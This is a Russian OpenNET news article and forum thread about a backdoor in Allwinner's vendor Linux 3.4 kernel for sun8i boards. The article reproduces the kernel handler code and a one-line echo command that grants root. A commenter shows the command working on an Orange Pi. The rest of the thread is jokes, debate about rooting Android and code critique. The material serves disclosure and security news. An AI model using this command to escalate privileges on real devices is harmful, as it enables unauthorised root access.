The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от opennews (??) on 10-Май-16, 13:04 
Разработчики Linux-дистрибутива Armbian обратили внимание (http://forum.armbian.com/index.php/topic/1108-security-alert.../) на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (http://linux-sunxi.org) (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".


<font color="#461b7e">
   $ id
   uid=1000(user) gid=1000(user)

   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

   $ id
   uid=0(root) gid=0(root)

</font>


Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner  H3, A83T и H8, включая Orange Pi, FriendlyARM (https://github.com/friendlyarm/h3_lichee/issues/1), SinoVoip M2+ (https://github.com/BPI-SINOVOIP/BPI-M2P-bsp/issues/1) и M3 Banana Pi (https://github.com/BPI-SINOVOIP/BPI-M3-bsp/issues/10), Cubietruck (https://github.com/cubieboard/Cubietruck_Plus-kernel-source/...) и LinkSprite pcDuino8 Uno (https://github.com/pcduino/pcduino8-uno-kernel/issues/3).

Для предоставления прав root в обработчике sunxi_proc_su_write используется (https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/...) следующий код, выставляющий привилегии root текущему процессу:

<font color="#461b7e">
        if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
    }
</font>

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен (https://github.com/friendlyarm/h3_lichee/commit/5d4d02b1c8f3...) патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива  Armbian 5.10 (http://www.armbian.com/).

URL: http://www.theregister.co.uk/2016/05/09/allwinners_allloser_.../
Новость: http://www.opennet.dev/opennews/art.shtml?num=44395

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +25 +/
Сообщение от Аноним (??) on 10-Май-16, 13:04 
отладочный режим для АНБ ФСБ КГБ
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 13:11 
короче для всех кроме нас)
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

17. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +2 +/
Сообщение от Аноним (??) on 10-Май-16, 15:26 
А вы, надо полагать, ЦРУ?
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

21. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +12 +/
Сообщение от Аноним (??) on 10-Май-16, 16:17 
Нет, ми моссад.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

46. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от Fantomas (??) on 11-Май-16, 04:46 
Московский сад что ли?
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

47. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от t28 on 11-Май-16, 09:22 
Да.
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

41. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 23:23 
>  короче для всех кроме нас)

А у тебя что, echo не работает?

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

19. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от Аноним (??) on 10-Май-16, 15:51 
ru.wikipedia.org
Совет по национальной безопасности (United States National Security Council) — совещательный и координирующий орган при Президенте США.
Национальный совет по контрразведке (National Counterintelligence Board).
Министерство национальной безопасности США.
Центральное разведывательное управление.
Агентство национальной безопасности (США).
Федеральное бюро расследований.
Разведывательное управление министерства обороны США.
Секретная служба США.
Национальное управление военно-космической разведки США.
Бюро разведки и исследований государственного департамента.
и другие (всего 16).
Так же к спецслужбам относятся и другие службы
Агентство по перспективным оборонным научно-исследовательским разработкам США.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

26. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +4 +/
Сообщение от Аноним (??) on 10-Май-16, 17:45 
Очень полезная функция на андроиде. Или получение рута через недокументированные "уязвимости" путем запуска подозрительных бинарей лучше?
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

34. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от Eklykti on 10-Май-16, 19:37 
Угу, только ты ставишь «калькулятор» из маркета, а он получает таким образом рута и ставит тебе уже настоящий бэкдор.
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

35. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от Crazy Alex (ok) on 10-Май-16, 20:20 
Если ты хочешь безопасность на андроиде - какой, к лешему, маркет? Опять же - в принципе можно и бинарный патч наложить после этого. Хотя бы просто строку покорёжить.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

36. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от РОСКОМУЗОР on 10-Май-16, 21:10 
Если ты хочешь безопасность, какой к лешему андроид?
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

37. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +3 +/
Сообщение от God on 10-Май-16, 21:38 
Если ты хочешь, то какая к лешему безопасность?
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

38. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Crazy Alex (ok) on 10-Май-16, 21:48 
Самый обычный. Если не надо прятаться от спецслужб и прочих врагов, а всего лишь хочется не иметь вирусни - f-droid вместо непонятного софта из маркета и всё будет в порядке.
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

39. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от vitalif (ok) on 10-Май-16, 21:49 
Не, на андроиде маст хэв!
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

6. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +5 +/
Сообщение от Аноним (??) on 10-Май-16, 13:42 
Это не баг, это фича!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –1 +/
Сообщение от бедный буратино (ok) on 10-Май-16, 14:01 
пойду свой armbian проверю
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

42. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –1 +/
Сообщение от Аноним (??) on 10-Май-16, 23:25 
> пойду свой armbian проверю

Не надо всякие бэкдорианы ставить и вендорские ядра. Только майнлайн, только дебиан, только хардкор.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

11. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –3 +/
Сообщение от Аноним as anon on 10-Май-16, 14:35 
К андроиду данная новость не имеет никакого отношения. Если ни разу не видели что такое банана-пи и прочие линуксовые SOC, то просто переводите исходник новости без собственных пубертатных фантазий.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +3 +/
Сообщение от p5n email(ok) on 10-Май-16, 14:51 
Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно не с ангстрём линуксом.

А вообще было бы здорово, если бы все производители BSP для мобильных чипов так делали. А то зарутовать телефон - целая проблема.

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

27. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от Аноним (??) on 10-Май-16, 17:47 
> Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно
> не с ангстрём линуксом.
> А вообще было бы здорово, если бы все производители BSP для мобильных
> чипов так делали. А то зарутовать телефон - целая проблема.

Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться в шелл при первм юзе, а потом отключать дырку.

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

43. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 23:26 
> Например cubieboard идёт с прошитым андроидом.

У SD-карты приоритет. А у некоторых allwinner вообще только загрузка с карты и есть.

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

13. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 14:48 
Может стоит написать в новости кто же этот герой, добавивший бэкдор?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

15. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от p5n email(ok) on 10-Май-16, 14:52 
> Может стоит написать в новости кто же этот герой, добавивший бэкдор?

Врядли компания Allwinner это расскажет. Речь о их форке ядра.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

23. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 16:54 
$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
-bash: /proc/sunxi_debug/sunxi_debug: No such file or directory
$ uname -a
Linux evo 3.4.79-sunxi #2 SMP PREEMPT Sun Jul 13 20:36:39 EEST 2014 armv7l GNU/Linux
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

24. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 16:56 
а, там только для арм8. посыпаю голову пеплом :}
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

28. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от anonymous (??) on 10-Май-16, 18:25 
sun8i - это armv7

orangepi@OrangePI:~$ uname -a
Linux OrangePI 3.4.39 #2 SMP PREEMPT Mon Oct 12 12:03:03 CEST 2015 armv7l GNU/Linux
orangepi@OrangePI:~$ id
uid=1000(orangepi) gid=1000(orangepi) groups=1000(orangepi),27(sudo)
orangepi@OrangePI:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
orangepi@OrangePI:~$ id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1000(orangepi)

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

25. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –3 +/
Сообщение от Аноним (??) on 10-Май-16, 17:06 
тот самый случай, когда proc не в прок
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –1 +/
Сообщение от Аноним (??) on 10-Май-16, 23:28 
> тот самый случай, когда proc не в прок

Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено в системе?

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

54. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 11-Май-16, 23:38 
>> тот самый случай, когда proc не в прок
> Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено
> в системе?

Ныхрены это смотреть на _отлаженной_ системе?

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

29. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +4 +/
Сообщение от anonimus on 10-Май-16, 18:27 
Строка `cred->euid = 0;` написана 2 раза

Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +1 +/
Сообщение от тоже Аноним (ok) on 10-Май-16, 18:35 
Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единорогу придется не только блевать радугой, но и какать бабочками.
Но пока, насколько мне известно, ему это не грозит.
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

32. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от anonimus on 10-Май-16, 18:44 
Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитной работы не гробили систему. Очень печально, когда подобная гадость портит тебе жизнь. Учитывая, что столько косяков в 10 строчках и учитывая, что код работает в режиме ядра, очень стремно становится от мысли, что же там творится в более сложном коде.
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

31. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –1 +/
Сообщение от anonimus on 10-Май-16, 18:38 
да и код сравнения строк с strncmp написан неаккуратненько. Надо бы сначала убедиться что count >= 12 (еще лучше, просто == 12) и лишь затем вызывать  strncmp(..., 12)
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

33. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +3 +/
Сообщение от Аноним (??) on 10-Май-16, 19:25 
А смысл? Вернет значение больше нуля да и ладно
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

51. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от alex (??) on 11-Май-16, 17:37 
count - это типа сначала длину строки в буфере проверить?
дак сравнение точно также пройдётся по нему
проблема может возникнуть только если буфер меньше 12+1 байт и при этом в нём нет нулевого байта, но тогда и длину не получится определить корректно.
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

40. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от chinarulezzz (ok) on 10-Май-16, 22:27 
> предлагаемое компанией Allwinner

к перцам нужно внимательней относиться)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

45. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 10-Май-16, 23:57 
>> предлагаемое компанией Allwinner
> к перцам нужно внимательней относиться)

У них там все драйверы такие. Где дебаг, где просто баг. Пользуйтесь майнлайном.

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

48. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от IZh. on 11-Май-16, 11:56 
> cred->uid = 0;
> ...

А RCU для кого писано?
Вот тут точно статические анализаторы могли бы warning выдавать.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

52. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 11-Май-16, 17:50 
Э "Бэкдор позиционируется как отладочный ре" типа уже позиционируется малварь легальный можно писать и грабить что ле?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

53. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  –1 +/
Сообщение от Аноним (??) on 11-Май-16, 17:53 
такая спокойная беседа о бэкдоре
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

55. "Бэкдор в отладочном коде модифицированного ядра Linux для си..."  +/
Сообщение от Аноним (??) on 11-Май-16, 23:39 
> такая спокойная беседа о бэкдоре

Так они повсюду. Чтобы не понтоваться - надо выкинуть девайся и к староверам, в тайгу. А так, мыши, конечно, плакали, кололись - но фуле делать, социальность обезьяньего стада не истребить ничем! :)

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру